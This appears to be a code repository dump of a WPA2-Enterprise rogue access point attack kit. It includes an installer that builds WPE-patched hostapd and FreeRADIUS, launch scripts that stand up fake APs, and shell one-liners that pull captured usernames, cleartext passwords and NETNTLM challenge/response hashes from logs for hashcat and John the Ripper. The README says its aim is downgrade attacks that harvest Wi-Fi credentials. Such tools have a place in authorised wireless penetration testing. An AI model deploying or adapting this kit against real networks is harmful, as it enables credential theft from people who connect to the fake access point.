├── files
├── hostapd_wpe
│ ├── certs
│ │ ├── serial
│ │ ├── serial.old
│ │ ├── index.txt.attr
│ │ ├── ca.der
│ │ ├── random
│ │ ├── server.p12
│ │ ├── index.txt
│ │ ├── dh
│ │ ├── xpextensions
│ │ ├── server.csr
│ │ ├── client.cnf
│ │ ├── server.cnf
│ │ ├── demoCA
│ │ │ └── cacert.pem
│ │ ├── ca.cnf
│ │ ├── ca.pem
│ │ ├── ca.key
│ │ ├── server.key
│ │ ├── bootstrap
│ │ ├── server.pem
│ │ ├── 01.pem
│ │ ├── server.crt
│ │ ├── Makefile
│ │ └── README
│ ├── hostapd-wpe.log
│ ├── hostapd-wpe.eap_user
│ └── hostapd-wpe.conf
├── ap.conf
├── temp.conf
├── users
├── clients.conf
└── eap.conf
├── freeradius_wpe_get_jtr_hashes.sh
├── freeradius_wpe_read.sh
├── freeradius_wpe_get_hashcat_hashes.sh
├── freeradius_wpe_init.sh
├── hostapd_wpe_init.sh
├── install.sh
└── README.md
/files/hostapd_wpe/certs/serial:
--------------------------------------------------------------------------------
1 | 02
2 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/serial.old:
--------------------------------------------------------------------------------
1 | 01
2 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/index.txt.attr:
--------------------------------------------------------------------------------
1 | unique_subject = yes
2 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/ca.der:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ricardojoserf/wpa2-enterprise-attack/HEAD/files/hostapd_wpe/certs/ca.der
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/random:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ricardojoserf/wpa2-enterprise-attack/HEAD/files/hostapd_wpe/certs/random
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.p12:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ricardojoserf/wpa2-enterprise-attack/HEAD/files/hostapd_wpe/certs/server.p12
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/index.txt:
--------------------------------------------------------------------------------
1 | V 190307202545Z 01 unknown /C=FR/ST=Radius/O=Example Inc./CN=Example Server Certificate/emailAddress=admin@example.com
2 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/dh:
--------------------------------------------------------------------------------
1 | -----BEGIN DH PARAMETERS-----
2 | MIGHAoGBAJhlbAzaWM29VLf4samxMjKkZ9Xe6NougwtziblkuHcY/durwN5W/xcJ
3 | OYbf1WLDAlWtwmgNYFoPOcauwye2Cjizk0eSTyAhsBSEsfzun1Vov77BcgHVViKx
4 | +j9+aIsAFOxcZE9U8ex/yfr2felHAM4gtPYMw++O+5FRPpDnP9NDAgEC
5 | -----END DH PARAMETERS-----
6 |
--------------------------------------------------------------------------------
/freeradius_wpe_get_jtr_hashes.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | cat /usr/local/var/log/radius/freeradius-server-wpe.log | grep -A 1 -B 1 challe | sed -ze 's/\t//g' | sed -e 's/://g' | sed -e 's/username //g' | sed -ze 's/\nchallenge /:\$NETNTLM\$/g' | sed -ze 's/\nresponse /\$/g' | tr '-' ' ' | awk 'NF > 0'
4 |
--------------------------------------------------------------------------------
/freeradius_wpe_read.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | #sudo tail /usr/local/var/log/radius/freeradius-server-wpe.log
3 | cat /usr/local/var/log/radius/freeradius-server-wpe.log | grep -A 2 username | grep -B 1 pass | grep -v "-" | sed -ze 's/\n\tpassword//g' | sed -e 's/username://g' | sort -u | sed -e 's/\t//g'
4 |
--------------------------------------------------------------------------------
/freeradius_wpe_get_hashcat_hashes.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | cat /usr/local/var/log/radius/freeradius-server-wpe.log | grep -A 1 -B 1 challe | sed -ze 's/\t//g' | sed -e 's/://g' | sed -e 's/username //g' | sed -ze 's/\nchallenge / /g' | sed -ze 's/\nresponse / /g' | tr '-' ' ' | awk 'NF > 0' | awk '{ print $1 "::::" $3 ":" $2}'
4 |
--------------------------------------------------------------------------------
/files/ap.conf:
--------------------------------------------------------------------------------
1 | interface=wlan0
2 | driver=nl80211
3 | ssid=SSID_name
4 | logger_stdout=-1
5 | logger_stdout_level=0
6 | dump_file=/tmp/hostapd.dump
7 | ieee8021x=1
8 | eapol_key_index_workaround=0
9 | own_ip_addr=127.0.0.1
10 | auth_server_addr=127.0.0.1
11 | auth_server_port=1812
12 | auth_server_shared_secret=testing123
13 | wpa=1
14 | wpa_key_mgmt=WPA-EAP
15 | channel=1
16 | wpa_pairwise=TKIP CCMP
17 |
--------------------------------------------------------------------------------
/files/temp.conf:
--------------------------------------------------------------------------------
1 | interface=wlxc04a00118487
2 | driver=nl80211
3 | ssid=asd
4 | logger_stdout=-1
5 | logger_stdout_level=0
6 | dump_file=/tmp/hostapd.dump
7 | ieee8021x=1
8 | eapol_key_index_workaround=0
9 | own_ip_addr=127.0.0.1
10 | auth_server_addr=127.0.0.1
11 | auth_server_port=1812
12 | auth_server_shared_secret=testing123
13 | wpa=1
14 | wpa_key_mgmt=WPA-EAP
15 | channel=1
16 | wpa_pairwise=TKIP CCMP
17 |
--------------------------------------------------------------------------------
/freeradius_wpe_init.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | sudo killall hostapd radiusd
4 | sudo radiusd -X &
5 | sudo airmon-ng check kill
6 |
7 | if [ ! -z "$2" ]; then
8 | sed 's/SSID_name/'$1'/g' files/ap.conf > files/aux.conf
9 | sed '0,/wlan0/s/wlan0/'$2'/' files/aux.conf > files/temp.conf
10 | #rm files/aux.conf
11 | else
12 | sed 's/SSID_name/'$1'/g' files/ap.conf > files/temp.conf
13 | fi
14 |
15 | sudo hostapd files/temp.conf
16 |
17 |
--------------------------------------------------------------------------------
/hostapd_wpe_init.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | sudo files/hostapd_wpe/certs/bootstrap || files/hostapd_wpe/certs/bootstrap
4 | sudo airmon-ng check kill || airmon-ng check kill
5 |
6 | if [ ! -z "$2" ]; then
7 | sed 's/SSID_name/'$1'/g' files/hostapd_wpe/hostapd-wpe.conf > files/hostapd_wpe/aux.conf
8 | sed '0,/wlan0/s/wlan0/'$2'/' files/hostapd_wpe/aux.conf > files/hostapd_wpe/temp.conf
9 | rm files/hostapd_wpe/aux.conf
10 | else
11 | sed 's/SSID_name/'$1'/g' files/hostapd_wpe/hostapd-wpe.conf > files/hostapd_wpe/temp.conf
12 | fi
13 |
14 | cd files/hostapd_wpe && sudo hostapd-wpe temp.conf
15 |
16 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/xpextensions:
--------------------------------------------------------------------------------
1 | #
2 | # File containing the OID's required for Windows.
3 | #
4 | # http://support.microsoft.com/kb/814394/en-us
5 | #
6 | [ xpclient_ext]
7 | extendedKeyUsage = 1.3.6.1.5.5.7.3.2
8 |
9 | [ xpserver_ext]
10 | extendedKeyUsage = 1.3.6.1.5.5.7.3.1
11 |
12 | #
13 | # Add this to the PKCS#7 keybag attributes holding the client's private key
14 | # for machine authentication.
15 | #
16 | # the presence of this OID tells Windows XP that the cert is intended
17 | # for use by the computer itself, and not by an end-user.
18 | #
19 | # The other solution is to use Microsoft's web certificate server
20 | # to generate these certs.
21 | #
22 | # 1.3.6.1.4.1.311.17.2
23 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.csr:
--------------------------------------------------------------------------------
1 | -----BEGIN CERTIFICATE REQUEST-----
2 | MIIC1jCCAb4CAQAwgZAxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZSYWRpdXMxEjAQ
3 | BgNVBAcMCVNvbWV3aGVyZTEVMBMGA1UECgwMRXhhbXBsZSBJbmMuMSAwHgYJKoZI
4 | hvcNAQkBFhFhZG1pbkBleGFtcGxlLmNvbTEjMCEGA1UEAwwaRXhhbXBsZSBTZXJ2
5 | ZXIgQ2VydGlmaWNhdGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA
6 | 68/38dubhcPFHRSkKw75ACCxqhTrDRBfQB8wszL9P0b3iLL3t8zEyElT/2eyG7qD
7 | gZStGMYKoZejoBTyT/oykozrT8C+qSkZk8zg1WuggqMXcMjCySw43n2ieJjnYGuc
8 | kS8nNQ3H9Xt/On8BUhCnDGEPRGtIHOP0FBU8wDaBr1M/3J1/1k4doaqt5MNpagWd
9 | KQb/Nv7x40Zj2GMbO+Xxz/A2zikoHYU830tKFz7HI6IGZPYrujbI9DRXL5RevPh6
10 | fNhii++DxisW+SprniG1N319qX6khxtavQGgUa3j686LL5pCyLgCqRV5JbVxKb+k
11 | BLXJUC47x49F77aBjhwxAgMBAAGgADANBgkqhkiG9w0BAQsFAAOCAQEAJWxpks6m
12 | xdruSOuiDvVNWCATzf3f/1rqm18LniGc0zLHsY5dCiDw8w1Ix1z/p6dIVJ3mHD0z
13 | +eNyzqsB/zkFGH3J7twxdiaFG57fwfLqHKAeJ8VIzYqegemSJN2hgo6IoGQIJh5t
14 | 1e+DOu7c1zf+CD+/ugvVMrn+jpKCcYz3/nWPoZflDWnks/ovryCu8aqG9nfKPxr6
15 | 0Mquxf5qYXuA8aTx17EpuNtkO/w0VahtxU//XIp44FOOrefrLntqfHPFZLIHEdHb
16 | DzxsVCNOTkTmbXg46FSxx++63AF1mSPU0IXw1fpKGO5GMBvMWOtQ5YswLYzr/MQ6
17 | uR+lvBY9fR6evg==
18 | -----END CERTIFICATE REQUEST-----
19 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/client.cnf:
--------------------------------------------------------------------------------
1 | [ ca ]
2 | default_ca = CA_default
3 |
4 | [ CA_default ]
5 | dir = ./
6 | certs = $dir
7 | crl_dir = $dir/crl
8 | database = $dir/index.txt
9 | new_certs_dir = $dir
10 | certificate = $dir/server.pem
11 | serial = $dir/serial
12 | crl = $dir/crl.pem
13 | private_key = $dir/server.key
14 | RANDFILE = $dir/.rand
15 | name_opt = ca_default
16 | cert_opt = ca_default
17 | default_days = 365
18 | default_crl_days = 30
19 | default_md = md5
20 | preserve = no
21 | policy = policy_match
22 |
23 | [ policy_match ]
24 | countryName = match
25 | stateOrProvinceName = match
26 | organizationName = match
27 | organizationalUnitName = optional
28 | commonName = supplied
29 | emailAddress = optional
30 |
31 | [ policy_anything ]
32 | countryName = optional
33 | stateOrProvinceName = optional
34 | localityName = optional
35 | organizationName = optional
36 | organizationalUnitName = optional
37 | commonName = supplied
38 | emailAddress = optional
39 |
40 | [ req ]
41 | prompt = no
42 | distinguished_name = client
43 | default_bits = 2048
44 | input_password = whatever
45 | output_password = whatever
46 |
47 | [client]
48 | countryName = FR
49 | stateOrProvinceName = Radius
50 | localityName = Somewhere
51 | organizationName = Example Inc.
52 | emailAddress = user@example.com
53 | commonName = user@example.com
54 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.cnf:
--------------------------------------------------------------------------------
1 | [ ca ]
2 | default_ca = CA_default
3 |
4 | [ CA_default ]
5 | dir = ./
6 | certs = $dir
7 | crl_dir = $dir/crl
8 | database = $dir/index.txt
9 | new_certs_dir = $dir
10 | certificate = $dir/server.pem
11 | serial = $dir/serial
12 | crl = $dir/crl.pem
13 | private_key = $dir/server.key
14 | RANDFILE = $dir/.rand
15 | name_opt = ca_default
16 | cert_opt = ca_default
17 | default_days = 365
18 | default_crl_days = 30
19 | default_md = md5
20 | preserve = no
21 | policy = policy_match
22 |
23 | [ policy_match ]
24 | countryName = match
25 | stateOrProvinceName = match
26 | organizationName = match
27 | organizationalUnitName = optional
28 | commonName = supplied
29 | emailAddress = optional
30 |
31 | [ policy_anything ]
32 | countryName = optional
33 | stateOrProvinceName = optional
34 | localityName = optional
35 | organizationName = optional
36 | organizationalUnitName = optional
37 | commonName = supplied
38 | emailAddress = optional
39 |
40 | [ req ]
41 | prompt = no
42 | distinguished_name = server
43 | default_bits = 2048
44 | input_password = whatever
45 | output_password = whatever
46 |
47 | [server]
48 | countryName = FR
49 | stateOrProvinceName = Radius
50 | localityName = Somewhere
51 | organizationName = Example Inc.
52 | emailAddress = admin@example.com
53 | commonName = "Example Server Certificate"
54 |
55 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/demoCA/cacert.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN CERTIFICATE-----
2 | MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex
3 | ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT
4 | DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll
5 | bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv
6 | bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD
7 | QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE
8 | ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs
9 | aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu
10 | Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/
11 | 9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx
12 | 58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy
13 | UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF
14 | cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB
15 | paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH
16 | EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j
17 | YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B
18 | CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3
19 | DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh
20 | UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT
21 | L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF
22 | -----END CERTIFICATE-----
23 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | origin=$(pwd)
4 |
5 | sudo apt-get -y install libssl-dev libnl-genl-3-dev git aircrack-ng git hostapd openssl
6 | sudo apt-get -y install libssl1.0-dev pkg-config || echo 'Continuing...'
7 |
8 | mkdir install_h
9 | cd install_h && git clone https://github.com/OpenSecurityResearch/hostapd-wpe && wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz && tar -xzvf hostapd-2.6.tar.gz
10 | cd hostapd-2.6 && patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
11 | cd hostapd && make && sudo make install
12 | cd ../../hostapd-wpe/certs && ./bootstrap
13 | sudo cp install_h/hostapd-2.6/hostapd/hostapd-wpe /usr/bin/hostapd-wpe
14 |
15 | cd $origin
16 |
17 | mkdir install_f
18 | cd install_f
19 | wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
20 | wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
21 | tar -jxvf freeradius-server-2.1.12.tar.bz2
22 | cd freeradius-server-2.1.12
23 | patch -p1 < ../freeradius-wpe.patch
24 | ./configure && make && sudo make install
25 | sudo /usr/local/etc/raddb/certs/bootstrap && sudo ldconfig
26 |
27 | cd $origin
28 | sudo cp files/users /usr/local/etc/raddb/
29 | sudo cp files/clients.conf /usr/local/etc/raddb/
30 | sudo cp files/eap.conf /usr/local/etc/raddb/
31 | sudo chmod 640 /usr/local/etc/raddb/users
32 | sudo chmod 640 /usr/local/etc/raddb/clients.conf
33 | sudo chmod 640 /usr/local/etc/raddb/eap.conf
34 |
35 | cd $origin
36 | sudo rm -rf install_h
37 | sudo rm -rf install_f
38 |
39 |
40 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/ca.cnf:
--------------------------------------------------------------------------------
1 | [ ca ]
2 | default_ca = CA_default
3 |
4 | [ CA_default ]
5 | dir = ./
6 | certs = $dir
7 | crl_dir = $dir/crl
8 | database = $dir/index.txt
9 | new_certs_dir = $dir
10 | certificate = $dir/ca.pem
11 | serial = $dir/serial
12 | crl = $dir/crl.pem
13 | private_key = $dir/ca.key
14 | RANDFILE = $dir/.rand
15 | name_opt = ca_default
16 | cert_opt = ca_default
17 | default_days = 365
18 | default_crl_days = 30
19 | default_md = md5
20 | preserve = no
21 | policy = policy_match
22 |
23 | [ policy_match ]
24 | countryName = match
25 | stateOrProvinceName = match
26 | organizationName = match
27 | organizationalUnitName = optional
28 | commonName = supplied
29 | emailAddress = optional
30 |
31 | [ policy_anything ]
32 | countryName = optional
33 | stateOrProvinceName = optional
34 | localityName = optional
35 | organizationName = optional
36 | organizationalUnitName = optional
37 | commonName = supplied
38 | emailAddress = optional
39 |
40 | [ req ]
41 | prompt = no
42 | distinguished_name = certificate_authority
43 | default_bits = 2048
44 | input_password = whatever
45 | output_password = whatever
46 | x509_extensions = v3_ca
47 |
48 | [certificate_authority]
49 | countryName = FR
50 | stateOrProvinceName = Radius
51 | localityName = Somewhere
52 | organizationName = Example Inc.
53 | emailAddress = admin@example.com
54 | commonName = "Example Certificate Authority"
55 |
56 | [v3_ca]
57 | subjectKeyIdentifier = hash
58 | authorityKeyIdentifier = keyid:always,issuer:always
59 | basicConstraints = CA:true
60 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/ca.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN CERTIFICATE-----
2 | MIIEpzCCA4+gAwIBAgIJAJigjqQ+2OX/MA0GCSqGSIb3DQEBCwUAMIGTMQswCQYD
3 | VQQGEwJGUjEPMA0GA1UECAwGUmFkaXVzMRIwEAYDVQQHDAlTb21ld2hlcmUxFTAT
4 | BgNVBAoMDEV4YW1wbGUgSW5jLjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AZXhhbXBs
5 | ZS5jb20xJjAkBgNVBAMMHUV4YW1wbGUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MB4X
6 | DTE4MDMwNzIwMjU0NVoXDTE5MDMwNzIwMjU0NVowgZMxCzAJBgNVBAYTAkZSMQ8w
7 | DQYDVQQIDAZSYWRpdXMxEjAQBgNVBAcMCVNvbWV3aGVyZTEVMBMGA1UECgwMRXhh
8 | bXBsZSBJbmMuMSAwHgYJKoZIhvcNAQkBFhFhZG1pbkBleGFtcGxlLmNvbTEmMCQG
9 | A1UEAwwdRXhhbXBsZSBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqGSIb3
10 | DQEBAQUAA4IBDwAwggEKAoIBAQCsokpOWhzKD2z+wJyb29DqrlRcz/4Kg7iFOREa
11 | dWEImYGHPAVcQ0ERE5izE9XW6BHTenpWHyBDuRp9joFWZcoSiDRA8Wb0y0SsL/bS
12 | 3XI384vhqP7nyYF1WANSn+x2ymkW+ro7wls+jEJZoz1L8pCWqh6AUPuXpVz9jFXH
13 | lwBScNuzQN3I0Fcq0to/uh32kg0a66aCiXR3HYFvDOZc/LolHtVnxWuCn3jII+vl
14 | ZGUxttjo7RDNTsA5kwZVHjESsv5TkQZOa9N/ir/cSzis+9SuhYVBNdQ9gC2jxGf7
15 | qcjkGe5OsMz92rXwzI2A+QWvBIf87oBlUgU7GzpPEN5+EksDAgMBAAGjgfswgfgw
16 | HQYDVR0OBBYEFP/W+uCJM7x5Bc0K+xC2t+IBE8IQMIHIBgNVHSMEgcAwgb2AFP/W
17 | +uCJM7x5Bc0K+xC2t+IBE8IQoYGZpIGWMIGTMQswCQYDVQQGEwJGUjEPMA0GA1UE
18 | CAwGUmFkaXVzMRIwEAYDVQQHDAlTb21ld2hlcmUxFTATBgNVBAoMDEV4YW1wbGUg
19 | SW5jLjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AZXhhbXBsZS5jb20xJjAkBgNVBAMM
20 | HUV4YW1wbGUgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ggkAmKCOpD7Y5f8wDAYDVR0T
21 | BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAjvamsW/L/weOnl9p8OHqB5eNk9Lt
22 | Rklz0yjEjwTHYp7GceCouIuwRRvhjsU9LBdjkkajfPdXvWlgVAM+h4yx5p0DlRJ/
23 | jz+8cyQyHP6JQATZpDbg2dOBq2KkF7cJJbi3HHeRJ3DiEHaa5DOceSpGfuk49iy5
24 | QWvDNuHkLH+HufjgijOCfcpCYSNxO3SGAtYyk9ZaVZemhLRpJ2mntsabA+ZcvOgp
25 | l1a+RQTHX1/BWJL5mFP6EV/pLhJiiMNkhZ43hiriaEhPgQV8fzthUlID78xwGuEU
26 | X+0aDLrXwYcHutUPJF5/tEPUK4vRJIeLSpg2Kq4AWQtjv7O22BUp+unjww==
27 | -----END CERTIFICATE-----
28 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/ca.key:
--------------------------------------------------------------------------------
1 | -----BEGIN ENCRYPTED PRIVATE KEY-----
2 | MIIFDjBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIhy+RM5eb0gMCAggA
3 | MBQGCCqGSIb3DQMHBAimh7fSyhdDCgSCBMjYa2SLj033ZiUXgin0o+vNlSk665wA
4 | SJo32KUkizXRIb57NyxKE3DAWUdPDF//xxbdXzUDpRzLOoKX+Snv7tlR8TjVMTGT
5 | WtT3erG6pdq+ZMzw6thbucfFHEXg/OMdFsMTFUW0KEEjeNZM87U6wZZjNLPs/KDW
6 | 6b40Abv7QPfQ+NdEq4G9tP6cS4X7jiZZUvOVEvNktsIufYqHdVo0X4va4j46XaAo
7 | XrUbz2Rld706HhFFJWAQ756ZSFmbxh61ZV4hIIVMvAQPM5omP14gw+15mNaKfQxN
8 | x9Uw/ZmSD6OsERdqpiK5Xom6npv17tOPebsxQrNIKdEg/FTWDcv6WfDEP/RhrriB
9 | +qkFpclrfaLLfeFQ4w5ZIUx6pBwEazBhI44yyZNyj0335apBFHgBanZvpCkIUF1z
10 | TNzHqQhcsr2rwPQfY03mCJ9I0yCdtzzk2J/PBsvIscuFcPU4LJsZCO1U0b99fygA
11 | TF9qKwUaM2QzCh6RsN4N6X4MdihjfwwgcsyTiDq+PbahuvVAaW6zkXweQQMLfV1R
12 | E0+t+xSHRnT+OplsaBrIMBJf/4TgCMQaZwvpMEg9k8VlfIEgvf0qN94SzaWihshw
13 | pniXKHFSwWdm4LZxGBz4ujSIJPJ+xMfYeDgIAO4rgnGyzxUxp2kpwMk95w3IjYtq
14 | CdSMSYl5+c469sDG+4E/3DhdwI4bqtoziAbb2tR6cgL7YRUh6IzGzI0UKqEr6a9R
15 | UooKVsSURzUo8wfXDqUDSW//Ldb1eoXtCPpcPJYbQe+0T1oRhK/GvM7yt42CIMxv
16 | WuZ3RD5DOCJrokHNOIZPSFnIGnCiZ8Jo0e2qkBfAzeisWLpyrjXkfj9+KzwJunSx
17 | UhXf6o55rgkvLnAPwf1zr5fO0k6qkdmg2MeXbaVdHI0hj9X8yCFnlWSIovZfvKjj
18 | 9AOIWVvcDljmt0W0cD8eDN+gTTbUy+xHj/hDu4jiEzPlchgHn2JysuutF6nku4QU
19 | YVHEzJbZZw42sl52A576Zh6hM4bPbthWII3WCElzWhZ3WYbEcbpgdlYUzAR6SlXD
20 | uUpHPc3gES9zo2ivjzI7miDyBbZq3Y8PZPvGwB0uJI9samHgMEla7OvL7al1nZPm
21 | RcfO5MzKpy2j/Nlx2kL26Lf4nG49mdj5bPVXYV0Hxu+BCq8V0A0sPEzUjXhswtn2
22 | aeQwjtyuO6X9hvgPeOKV873ORo8LaETk6RNA2cvqBQYEtbUIBxqI7QtylC+qvL6P
23 | rQwUzIxsUxnjvH4gkOjl67UTlpEseBfqdOW5DtLtIaJXDD35m/ZSj8XruBzMTTp4
24 | Kin2SH3ILh/UVJ20FRtWLiCs6TXU4GSxbeYX4NqgHmnXdid2eX+UHypJCZs68Ttt
25 | M1oPZ2wymEFF1CmdKHiPSfUPUiXiAm72tJtobiCJVIBTo7WkpMIjp50BD1n+D6Y6
26 | ymYMiKVmj4pa6dJ7SEYXkk8VY6vpGWcMD3U/W6uSJXOyTL2kzfKzEltqJwbMRkiX
27 | 238MCs7PPPMD1EeUuNw7IRqKF4zrJlEaapbPywf7J0gh2jM5OHcY0xCaFKLIhOjG
28 | /1XF38l69xFJd/mAb8kKixORlcLQyX6w4K5Agy8fNrp7X/aJIIE0z+QGYg1ZZsLY
29 | xvg=
30 | -----END ENCRYPTED PRIVATE KEY-----
31 |
--------------------------------------------------------------------------------
/files/hostapd_wpe/certs/server.key:
--------------------------------------------------------------------------------
1 | -----BEGIN ENCRYPTED PRIVATE KEY-----
2 | MIIFDjBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIdFIoCWrnEBgCAggA
3 | MBQGCCqGSIb3DQMHBAjZtCBQmkSqIwSCBMjoqPSAXIJ5ALksrFvC2qGVdiTX/mNk
4 | zDTN1Kf+v4h7aspd3pOo2KTkKNhyj9IzRzp/NxOp8b1JZ/XA/E1JGPBMHieCu5WV
5 | 7z1F4PVlsowb4sZGh6yIOU7QpO3MyLv9GELnWMczthx89ZwvzGT1QdW5ET6aUE8N
6 | VVtLjRxJaBc9lcrtdQb7Iof3zDx+UMvI8rqlXhJCW9/AHaWhar8U2N72jU3CmIYd
7 | agp6k3ReKhcAoAU3x+z6iJQiNoZLjsrWFmt/d4il+o6EGUTjw46gVyplRO+WEuVd
8 | MgJuMQD/71s3ovaT/G5dbJG641fst2gXLqkPi5QJHQJkl41/q37AnpCAd9Anicc9
9 | /pAwHY7mvlCz5VLgeZagO7xPfcBj5C2T9VvRzwDN4yIf206J/DOPkezwd6ifd6i3
10 | CYwfe6WgmlHEJRJvpywOnucilguscvWmed2KXUxm46/a2IB4A7gp7tt2rVSeT1nC
11 | A41tqjztM/WI5JDSS+t9eD3UYeYOip8OxM/nfjE4viVtOnUvhsfdyRz0hYryeYnh
12 | aX1nM1SM2r3yGaUmNrlD/P620ZNWypn0HPEay5p1LJRElipAHQcdWU7sLVREErW7
13 | fkUBURp4OXgnhXBruD0DPJGQegPSeltG+W7jQN9dnwjz6N6o4RMGI7ZAsQbeR8jY
14 | jwmvDim1w0aFmINkC6N9UyuL5VVrmTwKwsCuupKscfnyNDzg5Iwfo5g3Ep2o7CAZ
15 | mAwU/kOQxyOq3pwAq+/+0SWtyTPB4/a0TYrnas/IAVU+mnrbeLTvq9BvFp7O1B6E
16 | lYNLqw/pqHdHSug6TwswgqLcA1F7SSgPywkXe5Rho726V4VmqeooEiPqLgAhPWR3
17 | tRyLhAGnXbFm4SR7c0ZLq0Rx96DCL/E5CGo88/Utmur7MMkoakPReuc3ka5bukfh
18 | WOMjZV2FkyxuB/qjIuZHYvH3EWmMEDZ56NDOuuBTv8OfzDSF+pfCzOx9q02P1DKk
19 | +OwlpWclMmC0F1MugkfLRBcGKkvL0/SgfjP3Q82F97Edx5Z/hmpqoRnY0gNIclnW
20 | SNpmMRnpNUDAjhwZpXzkaLZ2wukF71J95hLrRluiXGI3o7OeRnbU5QNN+HwHmDfY
21 | HV6dPTCP7wi1zrHaVMoFNK1aQ4Hjljvkg9tSgkbkT2aLMVbk2LTdkVI1po47BjcH
22 | /CIA4U89BfNvcgUERfj9EtD9q7VFCvzmvkTjxpLpkFCiPr8iY/bebtbSBnvPR/wD
23 | KoSuUgreLddQ7a3vnrMGFLiKYmfvQhlX/hQjj4NSkBHpiJbZ1q/G8Y1blZo0Rxfm
24 | oI8IrWCZrQCG7KGobbcJ84PoCWNPqYRF/jK/Eds0bOEoB7/8yUMQ7UQsBf6zF47m
25 | H70/GuQsff/NMYmTL0f+RUSGktNo62mvRd2/ORtCwLgUJjPbKFAbjC0nMj3YciY2
26 | bvtyKrQ/UXhBTsS97QqmBhdQD1gWdVkNzyZq6/lrQlTkYtJ5QFoWS/ToAGnV5Tjq
27 | AR3B6VSJB7I0nA+fVEhrDSGEqnytdk02EnKqbdeNDtvyYdqpWZe2URBdJKHB+UEI
28 | SnLvsceggNMD75HmmAcIYPqvAnYsRq2dH/BfNrc6JCrwcie8toDfg0j/6RxtMmMN
29 | PzE=
30 | -----END ENCRYPTED PRIVATE KEY-----
31 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WPA2-Enterprise: Rogue APs
2 |
3 | Through these scripts it is possible to create Rogue or Fake Access Points and carry out an authentication downgrade attack against WPA and WPA2-Enterprise networks, obtaining passwords in hash format or cleartext (if GTC downgrade is successful).
4 |
5 | Both the installation scripts, ISO files and virtual machines (in VMWare and VirtualBox format) are included.
6 |
7 |
8 |
9 |
10 | ### ISO files and Virtual machines download
11 |
